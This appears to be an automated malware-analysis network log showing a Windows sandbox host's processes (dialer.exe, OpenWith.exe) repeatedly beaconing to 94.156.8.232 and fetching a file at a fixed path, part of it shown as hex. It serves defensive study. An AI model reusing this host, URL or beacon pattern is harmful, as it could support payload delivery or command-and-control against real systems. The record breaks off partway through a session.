                      May 23, 2024 20:16:51.618299007 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.618452072 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.622498989 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.622548103 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.622802973 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.623055935 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.666575909 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.846887112 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.847223997 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.847224951 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.847301960 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.847383976 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857218027 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857331038 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:56.857444048 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857598066 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857620001 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.928145885 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.928277969 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:57.931924105 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:57.931952000 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.932714939 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.932836056 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:57.974575043 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:58.180495977 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:58.180639982 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:58.180708885 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:58.180877924 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:58.180877924 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:58.180919886 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:17:03.500260115 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:03.500313044 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:03.500420094 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:03.500504971 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:03.500518084 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.709291935 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.709413052 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.719013929 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.719070911 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.719451904 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.719595909 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.766500950 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.932308912 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.932393074 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.932579994 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.932826042 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.932843924 CEST4434972394.156.8.232192.168.2.6
                      • 94.156.8.232
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.6 | 49699 | 94.156.8.232 | 443 | 3544 | C:\Windows\SysWOW64\dialer.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:15:08 UTC | 561 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                      If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="
                      Connection: close
                      2024-05-23 18:15:08 UTC | 152 | IN | HTTP/1.1 200 OK
                      Content-Length: 2328166
                      Content-Type: audio/wav
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:08 GMT
                      Connection: close
                      Data Ascii:
                      2024-05-23 18:15:08 UTC8253INData Raw: ff 00 00 01 00 00 00 fe ff fe ff 01 00 02 00 01 00 fc ff fe ff 03 00 02 00 fe ff fe ff 01 00 02 00 01 00 ff ff 00 00 01 00 00 00 00 00 fe ff fe ff 01 00 02 00 00 00 fe ff 00 00 00 00 00 00 01 00 00 00 01 00 01 00 00 00 00 00 00 00 01 00 ff ff fe ff 01 00 03 00 01 00 fe ff 01 00 00 00 01 00 fe ff 01 00 00 00 ff ff fe ff 03 00 03 00 fd ff ff ff 02 00 01 00 fe ff 01 00 03 00 fe ff ff ff 02 00 01 00 fe ff 01 00 03 00 fc ff fe ff 04 00 03 00 fd ff ff ff 02 00 00 00 01 00 00 00 ff ff ff ff 00 00 02 00 01 00 fb ff fe ff 04 00 02 00 fc ff ff ff 02 00 00 00 00 00 00 00 fd ff 01 00 04 00 01 00 fd ff fc ff 02 00 02 00 ff ff fe ff 01 00 03 00 00 00 fe ff 01 00 ff ff 01 00 03 00 01 00 fc ff 00 00 03 00 fe ff fe ff 02 00 00 00 fe ff 01 00 01 00 01 00 00 00 ff ff fe ff
                      Data Ascii:
                      2024-05-23 18:15:08 UTC9432INData Raw: 0e 07 d9 fc fb 06 d9 fb 59 07 d0 fa 27 08 fb f9 74 09 3e f9 f3 0a bb f8 77 0c 9d f8 ec 0d dc f8 43 0f 30 f9 f9 0f 6c f9 12 10 9a f9 96 0f 5f f9 6a 0e b7 f8 bf 0c 16 f8 2c 0b 2f f8 9f 0a 31 f9 42 0b ef fa 1e 0d 2e fd d4 0f 4a ff c6 12 ba 00 40 15 fc 00 b0 16 e9 ff ab 16 dd fd 84 15 c7 fb d0 13 13 fa 26 12 c4 f8 57 10 c1 f7 7d 0e 31 f7 e0 0c df f6 79 0b 77 f6 41 0a eb f5 3f 09 6c f5 ce 08 3f f5 29 09 81 f5 74 0a 56 f6 8f 0c 38 f7 de 0e ea f7 ef 10 42 f8 70 12 54 f8 6d 13 4c f8 ec 13 0a f8 e5 13 74 f7 45 13 98 f6 11 12 6c f5 71 10 e7 f3 47 0e eb f1 9c 0b 20 f0 03 09 07 ef fc 06 00 ef d1 05 eb ef 5f 05 d5 f1 a5 05 29 f4 04 06 5c f6 03 06 60 f8 8e 05 5a fa 0d 05 41 fc 70 04 b8 fd a6 03 c9 fe c5 02 55 ff f5 01 9a ff 8c 01 97 ff b3 01 1e ff 36 02 12 fe f4 02 06
                      Data Ascii: Y't>wC0l_j,/1B.J@&W}1ywA?l?)tV8BpTmLtElqG _)\`ZApU6
                      2024-05-23 18:15:08 UTC10611INData Raw: f2 fe 07 fb 4a ff 16 fb 85 ff 5a fb ce ff f1 fb 3e 00 de fc 14 01 48 fe 52 02 c1 ff e1 03 f6 00 66 05 a0 01 a3 06 e3 01 a9 07 de 01 5e 08 ca 01 fd 08 f0 01 95 09 67 02 3c 0a ce 02 72 0a c9 02 e6 09 3d 02 c6 08 8e 01 a0 07 c0 00 b3 06 c3 ff d9 05 92 fe 24 05 c0 fd f4 04 72 fd 68 05 88 fd 2f 06 da fd ed 06 40 fe 8f 07 ad fe fe 07 de fe 53 08 0b ff b3 08 2f ff 24 09 1a ff 61 09 79 fe 14 09 89 fd 62 08 2f fc 23 07 79 fa 26 05 72 f8 a7 02 bd f6 1f 00 5b f5 fe fd 98 f4 70 fc cd f4 fc fb 19 f6 c4 fc c6 f7 40 fe 1e f9 b2 ff 08 fa 16 01 b3 fa 50 02 a6 fa e2 02 c0 f9 92 02 a5 f8 ee 01 32 f8 c0 01 44 f8 e0 01 94 f8 fa 01 b4 f8 f9 01 f7 f8 17 02 f1 f8 1e 02 77 f8 a4 01 4c f7 7b 00 ba f5 cb fe f7 f3 d3 fc 75 f2 e8 fa 98 f1 76 f9 8d f1 c5 f8 ca f1 92 f8 db f1 a3 f8 89
                      Data Ascii: JZ>HRf^g<r=$rh/@S/$ayb/#y&r[p@P2DwL{uv
                      2024-05-23 18:15:08 UTC11790INData Raw: fa 99 f9 49 f9 f3 f7 5b f8 2a f6 1a f8 ab f4 8e f8 bf f3 9c f9 1f f3 22 fb f0 f2 f0 fc 23 f3 8d fe bb f3 e5 ff 6b f4 3d 01 78 f5 df 02 12 f7 60 04 d3 f8 5b 05 4b fa a8 05 9e fb 4c 05 b1 fc 01 04 1d fd 34 02 ab fc 8d 00 ad fb 81 ff 50 fa ea fe 7e f8 cf fe a3 f6 3c ff 7a f5 0b 00 4d f5 d2 00 88 f5 a2 01 c5 f5 c6 02 01 f6 5a 04 5d f6 d0 05 75 f6 33 07 33 f6 c3 08 ed f5 9b 0a d9 f5 04 0c 15 f6 db 0c e1 f6 75 0d 8b f8 10 0e b0 fa 59 0e 87 fc 23 0e bb fd 8d 0d 59 fe 67 0c 2e fe 7d 0a 0b fd f7 07 7f fb 83 05 40 fa b0 03 8a f9 b8 02 4a f9 ad 02 95 f9 41 03 72 fa ec 03 46 fb 10 04 42 fb c8 03 4e fa ab 03 53 f9 e4 03 21 f9 25 04 b1 f9 44 04 a6 fa 63 04 aa fb 60 04 57 fc bf 03 57 fc 8f 02 a8 fb 34 01 a0 fa b0 ff 87 f9 32 fe 9a f8 ef fc 70 f8 4f fc 29 f9 fe fb 4e fa
                      Data Ascii: I[*"#k=x`[KL4P~<zMZ]u33uY#Yg.}@JArFBNS!%Dc`WW42pO)N


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      1 | 192.168.2.6 | 49707 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:15:27 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: xU2b84xhXZbqQYI
                      2024-05-23 18:15:28 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:27 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:28 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      2 | 192.168.2.6 | 49708 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:15:34 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: RAgFd01qjbFHl5s
                      2024-05-23 18:15:35 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:34 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:35 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      3 | 192.168.2.6 | 49709 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:15:41 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: sW1tFC9u4h8HrYr
                      2024-05-23 18:15:41 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:41 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:41 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      4 | 192.168.2.6 | 49710 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:15:47 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: M8ftLICEWZ7XZ6c
                      2024-05-23 18:15:47 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:47 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:47 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.6 | 49711 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:15:53 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: Uu0iaFdbG5AryZb
                      2024-05-23 18:15:53 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:53 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:15:53 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.6 | 49713 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:15:59 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: wmg987RLpbyqFSI
                      2024-05-23 18:16:00 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:59 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:00 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.6 | 49714 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:06 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: Q3ZCdcjUNS1IbZW
                      2024-05-23 18:16:06 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:06 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:06 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.6 | 49715 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:13 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: YpfXF0WYwZtHMSW
                      2024-05-23 18:16:13 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:13 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:13 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.6 | 49716 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:19 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: gBYpLgo7UasXiuG
                      2024-05-23 18:16:19 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:19 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:19 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.6 | 49717 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:25 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: TYefaI1F0MWWonG
                      2024-05-23 18:16:25 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:25 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:25 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.6 | 49718 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:31 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: 2ku58F9dUSVrZha
                      2024-05-23 18:16:32 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:32 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:32 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.6 | 49719 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:39 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: kvd5dMCTf5mbuop
                      2024-05-23 18:16:39 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:39 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:39 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.6 | 49720 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:45 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: EbWxOS52DLQr2vF
                      2024-05-23 18:16:45 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:45 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:45 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.6 | 49721 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:51 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
                      Sec-Websocket-Key: f5cmLiHAmSPq8o0
                      2024-05-23 18:16:51 UTC | 170 | IN | HTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=utf-8
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:16:51 GMT
                      Content-Length: 166
                      Connection: close
                      2024-05-23 18:16:51 UTC | 166 | IN | Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>Microsoft-IIS/8.0</center></body></html>


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.6 | 49722 | 94.156.8.232 | 443 | 1880 | C:\Windows\System32\OpenWith.exe
                      Timestamp | Bytes transferred | Direction | Data
                      2024-05-23 18:16:57 UTC | 469 | OUT | GET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
                      Upgrade: websocket
                      Connection: upgrade
                      Sec-Websocket-Version: 13
